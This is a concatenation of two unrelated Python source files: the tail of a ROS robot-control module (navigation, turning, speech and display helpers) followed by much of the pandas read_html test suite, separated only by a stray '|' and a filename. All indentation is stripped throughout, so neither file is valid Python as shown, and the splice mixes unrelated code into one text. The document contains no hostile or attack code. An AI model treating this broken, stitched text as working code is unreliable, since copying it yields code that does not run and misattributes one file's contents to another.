# map frame goto (requires localization)
def gotoPose(target_pose):
return exec_movebase(target_pose[0], target_pose[1], target_pose[2])
# map frame goto (requires localization)
def gotoLabel(target_label):
# TODO
pname = "/map_server/%s/gotopose" %target_label
if rospy.has_param(pname):
p = rospy.get_param(pname)
return exec_movebase(p[0], p[1], p[2])
else:
rospy.logerr("Label %s not found." %target_label)
return False
# odom frame direct control (no path planning)
def gotoTarget(gx, gy, frame='odom'):
goto_target(gx, gy, frame)
# odom frame direct control (no path planning)
def goto_target(gx, gy, frame='odom'):
exec_goto_target(gx, gy, frame)
# person follow
def start_follow_person(max_vel = 0.25): # non-blocking
exec_follow_person_start(max_vel)
def stop_follow_person():
exec_follow_person_stop()
# Turn
def turn(deg, ref='REL', frame='odom'):
if ref=='REL':
deg = NORM_180(deg)
print('turn %s %.2f frame %s' %(ref,deg,frame))
if ref=='REL':
return exec_turn_REL(deg,frame)
else:
return exec_turn_ABS(deg,frame)
def dsleep(d):
try:
rospy.sleep(d)
except KeyboardInterrupt:
return False
return True
# Wait
def wait(r=1):
global stop_request
#print('wait %.1f' %r)
if (r<=0):
return dsleep(0.1)
elif (r<1):
return dsleep(r)
else:
t = 0
e = True
while t<r and not stop_request and e:
d = min(1,r-t)
e = dsleep(d)
t += d
print("wait ... %f < %f %r %r " %(t,r, stop_request, e))
return e
# Sounds
def sound(name):
global assock
print('sound %s' %name)
try:
assock.send('SOUND %s\n\r' %name)
time.sleep(0.5)
data = assock.recv(80)
print(data)
except:
pass
def bip(r=1):
for i in range(0,r):
sound('bip')
def bop(r=1):
for i in range(0,r):
sound('bop')
def boom(r=1):
for i in range(0,r):
sound('boom')
# TTS
def say(text, language='en'):
global assock
print('say %s [%s]' %(text,language))
lstr = 'en-US'
if (language!='en'):
lstr = language+'-'+language.upper()
stage_say(text)
try:
assock.send('TTS[%s] %s\n\r' %(lstr,text))
rospy.sleep(1)
data = assock.recv(80)
print(data)
except:
rospy.sleep(3)
pass
stage_say("")
def stage_say(text, language='en'):
global stage_say_pub
s = String()
s.data = text
stage_say_pub.publish(s)
# ASR
def asr():
global assock, stop_request
#print 'ASR received: ',
try:
data = ''
while data=='' and not stop_request:
assock.send('ASR\n\r') # ask for ASR results
time.sleep(0.5)
data = assock.recv(160)
data = data.strip()
#print data
return data
except:
return ''
# MODIM
mws = None # MODIM websocket connection
try:
sys.path.append(os.getenv('MODIM_HOME')+"/src/GUI")
from ws_client import *
mws = ModimWSClient()
except:
print("No MODIM found!")
# example: show_image('red.jpg', 'default')
def showImage(value, which='default'):
show_image(value, which)
def show_image(value, which='default'):
global mws
if mws!=None:
cstr = 'im.executeModality("image_%s", "img/%s")' %(which,value)
#print(cstr)
r = mws.csend(cstr)
print(r)
def showText(value, which='default'):
show_text(value, which)
def show_text(value, which='default'):
global mws
if mws!=None:
cstr = 'im.executeModality("text_%s", "%s")' %(which,value)
#print(cstr)
r = mws.csend(cstr)
print(r)
# Precise move and turn
# Angle functions
def DEG2RAD(a):
return a*math.pi/180.0
def RAD2DEG(a):
return a/math.pi*180.0
def NORM_180(a):
if (a>180):
return a-360
elif (a<-180):
return a+360
else:
return a
def NORM_PI(a):
if (a>math.pi):
return a-2*math.pi
elif (a<-math.pi):
return a+2*math.pi
else:
return a
def norm_target_angle(a):
if (abs(NORM_PI(a-0))<0.3):
return 0;
elif (abs(NORM_PI(a-math.pi/2.0))<0.3):
return math.pi/2;
elif (abs(NORM_PI(a-math.pi))<0.3):
return math.pi;
elif (abs(NORM_PI(a-3*math.pi/2.0))<0.3):
return -math.pi/2;
else:
return a;
def exec_turn_ABS(th_deg, frame='odom'):
robot_pose = get_robot_pose(frame)
current_th_deg = RAD2DEG(robot_pose[2]) # deg
a_deg = NORM_180(th_deg - current_th_deg)
#print("Turn rel %.1f" %a_deg)
return exec_turn_REL(a_deg, 'odom')
def exec_turn_REL(th_deg, frame='odom'):
global rv_good, rv_min
robot_pose = get_robot_pose(frame)
current_th = robot_pose[2]
#print("TURN -- currentTh: %.1f -- targetTh %.1f" %(RAD2DEG(current_th), RAD2DEG(current_th) + th_deg))
#print("TURN -- to-normalize RAD: %.1f" %(current_th + DEG2RAD(th_deg)))
target_th = norm_target_angle(current_th + DEG2RAD(th_deg))
#print("TURN -- currentTh: %.1f -- targetTh %.1f" %(RAD2DEG(current_th), RAD2DEG(target_th)))
r = True
rv_nom = rv_good
if (th_deg < 0):
rv_nom *= -1
dth = abs(NORM_PI(target_th-current_th))
#print("TURN -- dTh %.2f norm_PI: %.2f" %(current_th-target_th,dth))
last_dth = dth
#print("TURN -- last_dth %.2f" %(last_dth))
while (dth>rv_min/8.0 and last_dth>=dth):
rv = rv_nom
if (dth<0.8):
rv = rv_nom*dth/0.8
if (abs(rv)<rv_min):
rv = rv_min*rv/abs(rv)
tv = 0.0
if setSpeed(tv, rv, 0.1, False):
robot_pose = get_robot_pose(frame)
current_th = robot_pose[2]
dth = abs(NORM_PI(target_th-current_th))
if (dth < last_dth or dth>0.3): # to avoid oscillation close to 0
last_dth = dth
else:
print("turn action canceled by user")
r = False
dth=0
#print("TURN -- POS: %.1f %.1f %.1f -- targetTh %.1f DTH %.2f -- VEL: %.2f %.2f" %(robot_pose[0], robot_pose[1], RAD2DEG(current_th), RAD2DEG(target_th), RAD2DEG(dth), tv, rv))
#print("TURN -- dth %.2f - last_dth %.2f" %(dth,last_dth))
setSpeed(0.0,0.0,0.1)
#print 'TURN -- end'
return r
def exec_move_REL(tx, frame='odom'):
global tv_good
robot_pose = get_robot_pose(frame)
start_pose = list(robot_pose)
tv_nom = tv_good
r = True
if (tx < 0):
tv_nom *= -1
tx *= -1
dx = abs(distance(start_pose,robot_pose) - tx)
while (dx>0.1):
tv = tv_nom
if (dx<0.5):
tv = tv_nom*dx/0.5
if (abs(tv)<tv_min):
tv = tv_min*tv/abs(tv)
rv = 0.0
if setSpeed(tv, rv, 0.1, False):
robot_pose = get_robot_pose(frame)
dx = abs(distance(start_pose, robot_pose) - tx)
else:
print("move action canceled by user")
r = False
dx = 0
#print("MOVE -- POS: %.1f %.1f %.1f -- targetTX %.1f DX %.1f -- VEL: %.2f %.2f" %(robot_pose[0], robot_pose[1], RAD2DEG(robot_pose[2]), tx, dx, tv, rv))
setSpeed(0.0,0.0,0.1)
return r
def exec_goto_target(gx,gy, frame='odom'):
global tv_good, rv_good, tv_min, rv_min, odom_robot_pose, map_robot_pose
robot_pose = get_robot_pose(frame)
goal_pose = [gx,gy,0]
r = True
dx = distance(goal_pose,robot_pose)
while (dx>0.2):
tv = tv_good
if (dx<0.5):
tv = tv*dx/0.5
if (abs(tv)<tv_min):
tv = tv_min*tv/abs(tv)
current_th = robot_pose[2]
th_goal = math.atan2(gy-robot_pose[1],gx-robot_pose[0])
#print("GOTO -- th_target: %.2f" %(RAD2DEG(th_goal)))
dth = NORM_PI(th_goal-current_th)
if abs(dth)>0.1:
rv = rv_good * dth/abs(dth)
else:
rv = 0
if (abs(dth)>0.8):
tv = tv_min
if (abs(dth)<0.8):
rv = rv*abs(dth)/0.8
if (abs(rv)<rv_min and abs(rv)>0):
rv = rv_min*rv/abs(rv)
if setSpeed(tv, rv, 0.1, False):
robot_pose = get_robot_pose(frame)
dx = distance(goal_pose, robot_pose)
else:
r = False
print("goto_target action canceled by user")
dx = 0
#print("GOTO -- POS: %.1f %.1f %.1f -- target %.1f %.1f -- dx: %.1f dth: %.1f -- VEL: %.2f %.2f" %(robot_pose[0], robot_pose[1], RAD2DEG(robot_pose[2]), gx, gy, dx, dth, tv, rv))
setSpeed(0.0,0.0,0.1)
return r
def dist_from_goal():
global target_pose
if target_pose != None:
p = get_robot_pose()
return math.sqrt(math.pow(p[0]-target_pose[0],2)+math.pow(p[1]-target_pose[1],2))
else:
return -1
def start_movebase_pose(target_pose): # non-blocking
start_movebase(target_pose[0], target_pose[1], target_pose[2])
def start_movebase(gx, gy, gth_deg): # non-blocking
global ac_movebase, move_base_running, target_pose
if (ac_movebase == None):
ac_movebase = actionlib.SimpleActionClient(ACTION_move_base,MoveBaseAction)
timeout = rospy.Duration(5)
if not ac_movebase.wait_for_server(timeout):
print("ERROR start_movebase: Cannot connect with move_base server")
return False
target_pose = [gx, gy, gth_deg/180.0*math.pi]
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = gx
goal.target_pose.pose.position.y = gy
yaw = gth_deg/180.0*math.pi
q = tf.transformations.quaternion_from_euler(0, 0, yaw)
goal.target_pose.pose.orientation = Quaternion(q[0],q[1],q[2],q[3])
ac_movebase.send_goal(goal)
move_base_running = True
print("move_base action started: target %r" %(target_pose))
rospy.sleep(0.2)
return True
def movebase_running():
global ac_movebase, move_base_running
r = False
if move_base_running:
try:
r = not ac_movebase.wait_for_result(rospy.Duration(1))
except KeyboardInterrupt:
print("movebase action canceled by user")
r = False
return r
def movebase_step(delay): # executes one move_base step of delay seconds
# return [finish, success]
# finish = True if action is terminated
# success = True if goal has been reached
global ac_movebase, move_base_running, target_pose
finish = False
success = False
rospy.sleep(delay)
try:
st = ac_movebase.get_state()
#res = ac_movebase.wait_for_result(rospy.Duration(delay)) # true: action finished
#res2 = ac_movebase.get_result()
#print("-- movebase wait_for_result: %r" %res)
#print("-- movebase result: %s" %res2)
#print("-- movebase state: %s" %st)
# state 1: running, 3: succeed, 4: abort
if rospy.has_param('/move_base_node/TrajectoryPlannerROS/xy_goal_tolerance'):
gt = rospy.get_param('/move_base_node/TrajectoryPlannerROS/xy_goal_tolerance')
elif rospy.has_param('/move_base_node/DWAPlannerROS/xy_goal_tolerance'):
gt = rospy.get_param('/move_base_node/DWAPlannerROS/xy_goal_tolerance')
else:
gt = 0.25
#gt *= 1.5 # margin needed to avoid deadlocks
#d = dist_from_goal()
#print("-- d: %f < %f" %(d,gt))
if st==1 and target_pose[2]>=999 and dist_from_goal()<gt:
print('Goal reached, ignoring orientation')
finish = True
success = True
elif st==3:
finish = True
success = True
elif st==4:
finish = True
success = False
except KeyboardInterrupt:
print("move_base action canceled by user")
finish = True
success = False
if finish:
print("move_base action finished. success: %r" %success)
return (finish, success)
def exec_movebase(gx, gy, gth_deg): # blocking
global ac_movebase, move_base_running, target_pose
r = start_movebase(gx, gy, gth_deg)
if not r:
return False
success = True
delay = 0.5
while move_base_running:
finish, success = movebase_step(delay)
if finish: # action is terminated
exec_movebase_stop()
print('Move action completed. Success: %r' %success)
move_base_running = False
target_pose = None
return success
def movebase_stop():
exec_movebase_stop()
def exec_movebase_stop():
global ac_movebase, move_base_running
move_base_running = False
target_pose = None
if (ac_movebase == None):
ac_movebase = actionlib.SimpleActionClient('move_base',MoveBaseAction)
timeout = rospy.Duration(5)
if not ac_movebase.wait_for_server(timeout):
print("ERROR stop_movebase: Cannot connect with move_base server")
return
ac_movebase.cancel_all_goals()
ac_follow_person = None # action client
follow_person_running = False # running flag
PERSON_FOLLOW_ACTION = 'follow_person'
def exec_follow_person_start(max_vel):
global ac_follow_person, follow_person_running
if not rococo_navigation_Found:
print("Action %s not available" %PERSON_FOLLOW_ACTION)
return
if (ac_follow_person == None):
ac_follow_person = actionlib.SimpleActionClient(PERSON_FOLLOW_ACTION,FollowPersonAction)
print('Waiting for action server %s ...' %PERSON_FOLLOW_ACTION)
ac_follow_person.wait_for_server()
print('Done')
goal = FollowPersonGoal()
goal.person_id = 0; # unused so far
goal.max_vel = max_vel; # m/s
ac_follow_person.send_goal(goal)
print("Follow person START")
follow_person_running = True
def exec_follow_person_stop():
global ac_follow_person, follow_person_running
if not rococo_navigation_Found:
print("Action %s not available" %PERSON_FOLLOW_ACTION)
return
if (ac_follow_person == None):
ac_follow_person = actionlib.SimpleActionClient(PERSON_FOLLOW_ACTION,FollowPersonAction)
print('Waiting for action server %s ...' %PERSON_FOLLOW_ACTION)
ac_follow_person.wait_for_server()
print('Done')
ac_follow_person.cancel_all_goals()
print("Follow person STOP")
follow_person_running = False
|
test_html.py | from __future__ import print_function
import os
import re
import threading
from functools import partial
import pytest
import numpy as np
from numpy.random import rand
from pandas import (DataFrame, MultiIndex, read_csv, Timestamp, Index,
date_range, Series)
from pandas.compat import (map, zip, StringIO, BytesIO,
is_platform_windows, PY3, reload)
from pandas.errors import ParserError
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.util.testing import makeCustomDataframe as mkdf, network
HERE = os.path.dirname(__file__)
@pytest.fixture(params=[
'chinese_utf-16.html',
'chinese_utf-32.html',
'chinese_utf-8.html',
'letz_latin1.html',
])
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), ('lists are not of equal size '
'len(list1) == {0}, '
'len(list2) == {1}'.format(len(list1),
len(list2)))
msg = 'not all list elements are DataFrames'
both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
isinstance(y, DataFrame), list1, list2))
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, '__version__', '4.2')
with tm.assert_raises_regex(ValueError, "minimum version"):
read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with tm.assert_raises_regex(ValueError, msg):
read_html(url, "google", flavor=flavor)
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs_lxml = read_html(filename, index_col=0, flavor=['lxml'])
dfs_bs4 = read_html(filename, index_col=0, flavor=['bs4'])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize("flavor", [
pytest.param('bs4', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No bs4')),
pytest.param('lxml', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml(object):
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath('io', 'data', 'spam.html')
self.spam_data_kwargs = {}
if PY3:
self.spam_data_kwargs['encoding'] = 'UTF-8'
self.banklist_data = datapath("io", "data", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@network
def test_banklist_url(self):
url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
df1 = self.read_html(url, 'First Federal Bank of Florida',
attrs={"id": 'table'})
df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
@network
def test_spam_url(self):
url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
df1 = self.read_html(url, '.*Water.*')
df2 = self.read_html(url, 'Unit')
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, '.*Florida.*',
attrs={'id': 'table'})
df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, '.*Water.*')
df2 = self.read_html(self.spam_data, 'Unit')
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == 'Proximates'
assert df1[0].columns[0] == 'Nutrient'
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
assert df.columns[0] == 'Proximates'
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_xrange(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows={1, 2})
df2 = self.read_html(self.spam_data, 'Unit', skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, '.*Water.*',
skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with tm.assert_raises_regex(TypeError, 'is not a valid type '
'for skipping rows'):
self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
def test_index(self):
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
@network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html('git://github.com', match='.*Water.*')
@network
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html('http://www.a23950sdfa908sd.com',
match='.*Water.*')
except ValueError as e:
assert 'No tables found' in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
'First',
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with tm.assert_raises_regex(ValueError, 'No tables found'):
self.read_html(url, 'First Federal Bank of Florida',
attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
df = self._bank_data(header=[0, 1], skiprows=1,
tupleize_cols=True)[0]
assert isinstance(df.columns, Index)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile('Florida')),
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
with tm.assert_raises_regex(ValueError,
r'\(you passed a negative value\)'):
self.read_html(self.spam_data, 'Water', skiprows=-1)
@network
def test_multiple_matches(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
assert len(dfs) > 1
@network
def test_python_docs_table(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(['Repo', 'What'])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "macau.html")
dfs = self.read_html(macau_data, index_col=0,
attrs={'class': 'style1'})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath('io', 'data', 'macau.html')
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
